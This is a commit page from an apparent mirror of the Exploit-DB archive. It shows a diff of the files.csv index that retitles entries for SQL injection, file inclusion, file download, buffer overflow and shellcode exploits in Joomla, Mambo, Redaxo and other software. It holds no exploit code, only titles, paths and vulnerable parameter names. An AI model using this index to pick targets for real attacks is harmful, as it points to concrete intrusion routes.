bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-04

Browse source 
14 new exploits

Microsoft Windows - Metafile (.WMF) Remote File Download Exploit Generator
Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator)

Redaxo CMS 3.2 - 'INCLUDE_PATH' Remote File Inclusion
Redaxo 3.2 - 'INCLUDE_PATH' Remote File Inclusion

Mambo Component com_loudmouth 4.0j -  Remote File Inclusion
Mambo Component com_loudmouth 4.0j - Remote File Inclusion

Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download
Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download

Mambo Component 'com_newsletter'  4.5 - 'listid' Parameter SQL Injection
Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection

Joomla! / Mambo Component com_catalogproduction - 'id' SQL Injection
Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection

Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit
Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute

DMXReady SDK 1.1 - Remote File Download
DMXReady SDK 1.1 - Arbitrary File Download

Joomla! 1.5.12 RCE via TinyMCE - Arbitrary File Upload
Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)

Joomla! Component Jw_allVideos - Remote File Download
Joomla! Component Jw_allVideos - Arbitrary File Download

Trouble Ticket Software - ttx.cgi Remote File Download
Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download

Redaxo CMS 4.2.1 - Remote File Inclusion
Redaxo 4.2.1 - Remote File Inclusion

Joomla! Component Music Manager - Local File Inclusion
Joomla! Component 'Music Manager' - Local File Inclusion

Joomla! Component NeoRecruit (com_neorecruit Itemid) - Blind SQL Injection
Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection
Joomla! Component artforms 2.1b7.2 rc2 - Multiple Vulnerabilities
Joomla! Component PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection
Joomla! Component 'com_artforms' 2.1b7.2 rc2 - Multiple Vulnerabilities
Joomla! Component 'PaymentsPlus' 2.1.5 - Blind SQL Injection
Joomla! Component Minify4Joomla! - Arbitrary File Upload / Persistent Cross-Site Scripting
Joomla! Component IXXO Cart - SQL Injection
Joomla! Component com_jomtube - (user_id) Blind SQL Injection / SQL Injection
Joomla! Component redSHOP 1.0 (com_redshop pid) - SQL Injection
Joomla! Component QuickFAQ (com_quickfaq) - Blind SQL Injection
Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting
Joomla! Component 'IXXO Cart' - SQL Injection
Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection
Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection
Joomla! Component 'com_quickfaq' - Blind SQL Injection
Joomla! Component MyHome (com_myhome) - Blind SQL Injection
Joomla! Component MySms (com_mysms) - Arbitrary File Upload
Joomla! Component Health & Fitness Stats - Persistent Cross-Site Scripting
Joomla! Component 'com_myhome' - Blind SQL Injection
Joomla! Component 'com_mysms' - Arbitrary File Upload
Joomla! Component 'healthstats' - Persistent Cross-Site Scripting

Joomla! Component Rapid Recipe - Persistent Cross-Site Scripting
Joomla! Component 'Rapid-Recipe' - Persistent Cross-Site Scripting

Joomla! Component EasyBlog - Persistent Cross-Site Scripting
Joomla! Component 'EasyBlog' - Persistent Cross-Site Scripting

Joomla! Component QContacts (com_qcontacts) - SQL Injection
Joomla! Component 'com_qcontacts' - SQL Injection

Joomla! Component RedShop 1.0.23.1 - Blind SQL Injection
Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection
Joomla! Component com_spa - SQL Injection (2)
Joomla! Component com_staticxt - SQL Injection
Joomla! Component 'com_spa' - SQL Injection (2)
Joomla! Component 'com_staticxt' - SQL Injection

Joomla! Component com_spa - SQL Injection (1)
Joomla! Component 'com_spa' - SQL Injection (1)
Joomla! Component com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta - SQL Injection
Joomla! Component com_huruhelpdesk - SQL Injection
Joomla! Component com_iproperty - SQL Injection
Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection
Joomla! Component 'com_huruhelpdesk' - SQL Injection
Joomla! Component 'com_iproperty' - SQL Injection
Joomla! Component Ozio Gallery (com_oziogallery) - SQL Injection
Joomla! Component ITArmory (com_itarmory) - SQL Injection
Joomla! Component 'com_oziogallery' - SQL Injection
Joomla! Component 'com_itarmory' - SQL Injection
Joomla! Component com_joomdle) 0.24 - SQL Injection
Joomla! Component com_youtube - SQL Injection
Joomla! Component 'com_joomdle' 0.24 - SQL Injection
Joomla! Component 'com_youtube' - SQL Injection

Joomla! Component com_Joomla-visites - Remote File Inclusion
Joomla! Component 'com_Joomla-visites' - Remote File Inclusion

Joomla! Component TTVideo 1.0 - SQL Injection
Joomla! Component 'com_ttvideo' 1.0 - SQL Injection

Joomla! Component appointinator 1.0.1 - Multiple Vulnerabilities
Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities

Joomla! Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injections
Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections

Joomla! Component com_beamospetition - SQL Injection
Joomla! Component 'com_beamospetition' - SQL Injection

Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download
Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download

Joomla! Component 1.0 'com_jdownloads' - Arbitrary File Upload
Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload

ADA IMGSVR 0.4 - Remote File Download
ADA IMGSVR 0.4 - Arbitrary File Download

Joomla! / Mambo Component com_buslicense - 'aid' Parameter SQL Injection
Joomla! / Mambo Component 'com_buslicense' - 'aid' Parameter SQL Injection

Joomla! / Mambo Component com_sermon 0.2 - 'gid' Parameter SQL Injection
Joomla! / Mambo Component 'com_sermon' 0.2 - 'gid' Parameter SQL Injection

Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_comments' 0.5.8.5g - 'id' Parameter SQL Injection

Joomla! / Mambo Component com_iomezun - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_iomezun' - 'id' Parameter SQL Injection
Joomla! / Mambo Component com_Joomlavvz - 'id' Parameter SQL Injection
Joomla! / Mambo Component com_most - 'secid' Parameter SQL Injection
Joomla! / Mambo Component com_asortyment - 'katid' Parameter SQL Injection
Joomla! / Mambo Component 'com_Joomlavvz' - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_most' - 'secid' Parameter SQL Injection
Joomla! / Mambo Component 'com_asortyment' - 'katid' Parameter SQL Injection
Joomla! / Mambo Component com_model - 'objid' Parameter SQL Injection
Joomla! / Mambo Component com_omnirealestate - 'objid' Parameter SQL Injection
Joomla! / Mambo Component 'com_model' - 'objid' Parameter SQL Injection
Joomla! / Mambo Component 'com_omnirealestate' - 'objid' Parameter SQL Injection
Joomla! / Mambo Component com_smslist - 'listid' Parameter SQL Injection
Joomla! / Mambo Component com_activities - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection
Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection

Joomla! / Mambo Component com_lexikon - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection
Joomla! / Mambo Component com_team - SQL Injection
Joomla! / Mambo Component com_iigcatalog - 'cat' Parameter SQL Injection
Joomla! / Mambo Component com_formtool - 'catid' Parameter SQL Injection
Joomla! / Mambo Component com_genealogy - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_team' - SQL Injection
Joomla! / Mambo Component 'com_iigcatalog' - 'cat' Parameter SQL Injection
Joomla! / Mambo Component 'com_formtool' - 'catid' Parameter SQL Injection
Joomla! / Mambo Component 'com_genealogy' - 'id' Parameter SQL Injection

Joomla! / Mambo Component com_hello_world - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_hello_world' - 'id' Parameter SQL Injection
Joomla! / Mambo Component com_publication - 'pid' Parameter SQL Injection
Joomla! / Mambo Component com_blog - 'pid' Parameter SQL Injection
Joomla! / Mambo Component 'com_publication' - 'pid' Parameter SQL Injection
Joomla! / Mambo Component 'com_blog' - 'pid' Parameter SQL Injection

Joomla! / Mambo Component com_wines 1.0 - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_wines' 1.0 - 'id' Parameter SQL Injection

Joomla! / Mambo Component com_inter - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_inter' - 'id' Parameter SQL Injection

Joomla! / Mambo Component com_guide - 'category' Parameter SQL Injection
Joomla! / Mambo Component 'com_guide' - 'category' Parameter SQL Injection

Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections
Joomla! / Mambo Component 'com_is' 1.0.1 - Multiple SQL Injections

Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusion
Joomla! / Mambo Component 'com_utchat' 0.2 - Multiple Remote File Inclusion

Vana CMS - 'Filename' Parameter Remote File Download
Vana CMS - 'Filename' Parameter Arbitrary File Download

Joomla! Component Rapid-Recipe - HTML Injection
Joomla! Component 'Rapid-Recipe' - HTML Injection

Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection
Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection

REDAXO - 'subpage' Parameter Cross-Site Scripting

Redaxo CMS 5.0.0 - Multiple Vulnerabilities
Redaxo 5.0.0 - Multiple Vulnerabilities

DarkComet Server - Remote File Download Exploit (Metasploit)
DarkComet Server - Arbitrary File Download (Metasploit)
WinaXe 7.7 'FTP client' - Remote Buffer Overflow
Rapid PHP Editor 14.1 - Remote Command Execution
Memcached 1.4.33 - PoC (1)
Memcached 1.4.33 - PoC (2)
Memcached 1.4.33 - PoC (3)
SweetRice 1.5.1 - Arbitrary File Download
Axessh 4.2 - Denial Of Service
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution
ETchat 3.7 - Cross-Site Request Forgery
sNews 1.7.1 - Cross-Site Request Forgery
sNews 1.7.1 - Arbitrary File Upload
PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow
nodCMS - Cross-Site Request Forgery
Redaxo 5.2.0 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2016-11-04 05:01:21 +00:00
parent 1f59ca27c2
commit 1edbc5ecc4
16 changed files with 847 additions and 87 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

165
files.csv
View file

@ -1187,7 +1187,7 @@ id,file,description,date,author,platform,type,port
1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003
1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps,0
1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - (news.asp hid) SQL Injection",2006-01-14,DetMyl,asp,webapps,0
1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile (.WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0
1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator)",2006-01-15,darkeagle,windows,remote,0
1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",windows,remote,13701
1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0
1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0
@ -1572,7 +1572,7 @@ id,file,description,date,author,platform,type,port
1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion",2006-06-01,Kacper,php,webapps,0
1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0
1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - (server.php) Remote File Inclusion",2006-06-01,beford,php,webapps,0
1861,platforms/php/webapps/1861.txt,"Redaxo CMS 3.2 - 'INCLUDE_PATH' Remote File Inclusion",2006-06-02,beford,php,webapps,0
1861,platforms/php/webapps/1861.txt,"Redaxo 3.2 - 'INCLUDE_PATH' Remote File Inclusion",2006-06-02,beford,php,webapps,0
1862,platforms/cgi/remote/1862.c,"iShopCart - vGetPost() Remote Buffer Overflow (cgi)",2006-06-02,K-sPecial,cgi,remote,0
1863,platforms/php/webapps/1863.txt,"Igloo 0.1.9 - (Wiki.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
@ -1732,7 +1732,7 @@ id,file,description,date,author,platform,type,port
2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0
2022,platforms/php/webapps/2022.txt,"Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
2024,platforms/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
2025,platforms/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0
2026,platforms/php/webapps/2026.txt,"Mambo Component com_hashcash 1.2.1 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
@ -4039,7 +4039,7 @@ id,file,description,date,author,platform,type,port
4383,platforms/php/webapps/4383.txt,"Joomla! Component Restaurante - Arbitrary File Upload",2007-09-08,"Cold Zero",php,webapps,0
4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion",2007-09-08,MhZ91,php,webapps,0
4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0
4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download",2007-09-10,k-one,php,webapps,0
4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download",2007-09-10,k-one,php,webapps,0
4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0
4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' SaveToFile() Insecure Method",2007-09-10,shinnai,windows,remote,0
4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0
@ -4654,7 +4654,7 @@ id,file,description,date,author,platform,type,port
5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
5007,platforms/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5007,platforms/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5008,platforms/php/webapps/5008.txt,"Mambo Component 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5009,platforms/php/webapps/5009.txt,"Mambo Component 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5010,platforms/php/webapps/5010.txt,"Mambo Component 'com_glossary' 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
@ -6661,7 +6661,7 @@ id,file,description,date,author,platform,type,port
7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - (book_id) SQL Injection",2008-11-11,boom3rang,php,webapps,0
7093,platforms/php/webapps/7093.txt,"Joomla! Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,php,webapps,0
7094,platforms/php/webapps/7094.txt,"Pre Real Estate Listings - Arbitrary File Upload",2008-11-11,BackDoor,php,webapps,0
7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component com_catalogproduction - 'id' SQL Injection",2008-11-11,boom3rang,php,webapps,0
7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection",2008-11-11,boom3rang,php,webapps,0
7096,platforms/php/webapps/7096.txt,"Joomla! Component Simple RSS Reader 1.0 - Remote File Inclusion",2008-11-11,NoGe,php,webapps,0
7097,platforms/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0
7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0
@ -7174,7 +7174,7 @@ id,file,description,date,author,platform,type,port
7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0
7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,windows,remote,0
7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0
7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0
7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0
@ -7333,7 +7333,7 @@ id,file,description,date,author,platform,type,port
7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - (index.php preview) Local File Inclusion",2009-01-14,Osirys,php,webapps,0
7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0
7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0
7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Remote File Download",2009-01-14,ajann,asp,webapps,0
7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps,0
7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0
7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,asp,webapps,0
7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0
@ -9499,7 +9499,7 @@ id,file,description,date,author,platform,type,port
10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0
10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
10182,platforms/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos,0
10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 RCE via TinyMCE - Arbitrary File Upload",2009-11-19,daath,php,webapps,80
10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,php,webapps,80
10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0
10185,platforms/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0
10186,platforms/bsd/dos/10186.txt,"K-Meleon 1.5.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0
@ -10489,7 +10489,7 @@ id,file,description,date,author,platform,type,port
11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
11446,platforms/php/webapps/11446.txt,"Mambo Component 'com_akogallery' - SQL Injection",2010-02-14,snakespc,php,webapps,0
11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0
11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0
11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
@ -10817,7 +10817,7 @@ id,file,description,date,author,platform,type,port
11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0
11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0
11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0
11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0
11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,cgi,webapps,0
11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0
11825,platforms/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0
11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software - 'product.php' SQL Injection",2010-03-21,Asyraf,php,webapps,0
@ -11218,7 +11218,7 @@ id,file,description,date,author,platform,type,port
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
12276,platforms/php/webapps/12276.txt,"Redaxo CMS 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
12276,platforms/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-18,"cr4wl3r ",php,webapps,0
12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0
12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0
@ -12436,7 +12436,7 @@ id,file,description,date,author,platform,type,port
30100,platforms/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0
14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80
14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0
14274,platforms/php/webapps/14274.txt,"Joomla! Component Music Manager - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0
14274,platforms/php/webapps/14274.txt,"Joomla! Component 'Music Manager' - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0
14142,platforms/arm/shellcode/14142.c,"Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0
14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - 'CoolType.dll' Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos,0
14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0
@ -12514,7 +12514,7 @@ id,file,description,date,author,platform,type,port
14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection",2010-07-05,"ADEO Security",php,webapps,0
14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14250,platforms/php/webapps/14250.txt,"Joomla! Component NeoRecruit (com_neorecruit Itemid) - Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14250,platforms/php/webapps/14250.txt,"Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14221,platforms/windows/shellcode/14221.html,"Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0
14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
@ -12552,8 +12552,8 @@ id,file,description,date,author,platform,type,port
14261,platforms/arm/shellcode/14261.c,"ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0
14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0
14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps,0
14263,platforms/php/webapps/14263.txt,"Joomla! Component artforms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0
14265,platforms/php/webapps/14265.txt,"Joomla! Component PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0
14263,platforms/php/webapps/14263.txt,"Joomla! Component 'com_artforms' 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0
14265,platforms/php/webapps/14265.txt,"Joomla! Component 'PaymentsPlus' 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0
14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0
14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0
14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0
@ -12575,11 +12575,11 @@ id,file,description,date,author,platform,type,port
14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0
